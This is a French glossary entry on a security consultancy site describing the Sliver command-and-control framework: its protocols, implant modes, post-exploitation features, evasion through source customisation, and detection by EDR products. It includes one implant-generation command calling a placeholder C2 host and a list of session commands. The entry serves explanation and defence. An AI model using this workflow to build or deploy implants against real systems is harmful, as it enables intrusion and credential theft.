Aller au contenu principal
Expert Cybersécurité & IAv9.0
Centres de ressources conformité
Besoin d'un accompagnement expert ?
Devis personnalisé sous 24h — audit, conformité, incident
Checklists Sécurité — Audit & Durcissement
Formats disponibles
📄 PDF 📊 Excel 🌐 Web

11 checklists professionnelles couvrant 2 200+ points de contrôle. Téléchargement gratuit, aucune inscription.

Sliver C2

hacking

Définition

Sliver est un framework de Command and Control (C2) open source développé par BishopFox, conçu comme une alternative open source à Cobalt Strike. Écrit en Go, il génère des implants (agents) qui s'exécutent sur les systèmes compromis et communiquent avec le serveur C2 de l'attaquant via plusieurs protocoles. Sliver supporte plusieurs modes de communication : mTLS (mutual TLS), HTTP/HTTPS, DNS, et WireGuard. La diversité des protocoles permet d'adapter le canal de communication aux contraintes de filtrage réseau de l'environnement cible. Les implants peuvent être configurés en mode 'beacon' (communication périodique, similaire au Beacon Cobalt Strike) ou en mode 'session' (connexion interactive continue). Les fonctionnalités de Sliver couvrent les besoins standards de post-exploitation : exécution de commandes, upload/download de fichiers, pivoting réseau (SOCKS5 proxy), port forwarding, process injection (shinject, execute-assembly), credential access (dump de LSASS, SAM, cookies de navigateurs), mouvement latéral (PsExec, WMI, SMB), et exécution de BOF (Beacon Object Files compatibles). Parmi les caractéristiques distinctives : les implants sont compilés dynamiquement avec des configurations de communication intégrées et des clés de chiffrement uniques par implant, les communications sont authentifiées et chiffrées, le serveur peut gérer simultanément de nombreux implants, et une interface collaborative permet à plusieurs opérateurs de partager un serveur Sliver. La compilation Go produit des binaires statiques autonomes pour Windows, Linux et macOS. Sliver est de plus en plus utilisé par des acteurs malveillants réels (pas seulement des red teams légitimes) depuis 2022, attestant de sa maturité comme framework C2. Microsoft a documenté des campagnes APT utilisant Sliver comme alternative moins détectée à Cobalt Strike.

Fonctionnement

Après installation (./sliver-server), l'opérateur génère un implant (generate --mtls server.example.com:443 -o /tmp/implant.exe), le déploie sur la cible, et reçoit une connexion dans la console Sliver. sessions liste les connexions actives, use SESSION_ID sélectionne une session, et des commandes comme shell, download, upload, socks5, portfwd et execute-assembly effectuent les opérations post-exploitation.

Exploitation offensive

L'open source de Sliver permet une personnalisation complète pour l'évasion : modifier les chaînes hardcodées identifiables, changer les signatures réseau, et adapter les protocoles. Les implants Go compilés statiquement ont une petite empreinte sur disque et peuvent être compilés pour des architectures exotiques (ARM, MIPS pour IoT/routeurs).

Détection et mitigation

Les signatures de Sliver (patterns de certificats TLS, structures d'implants Go, patterns de communication) sont progressivement intégrées dans les produits EDR après sa popularisation. Elastic, CrowdStrike et Microsoft Defender for Endpoint ont publié des détections spécifiques pour Sliver. La surveillance des binaires Go statiques à grande entropie et des communications TLS avec des JA3 fingerprints spécifiques aide à la détection.

Articles liés

Un projet cybersécurité ?

Expert dispo · Réponse 24h

Devis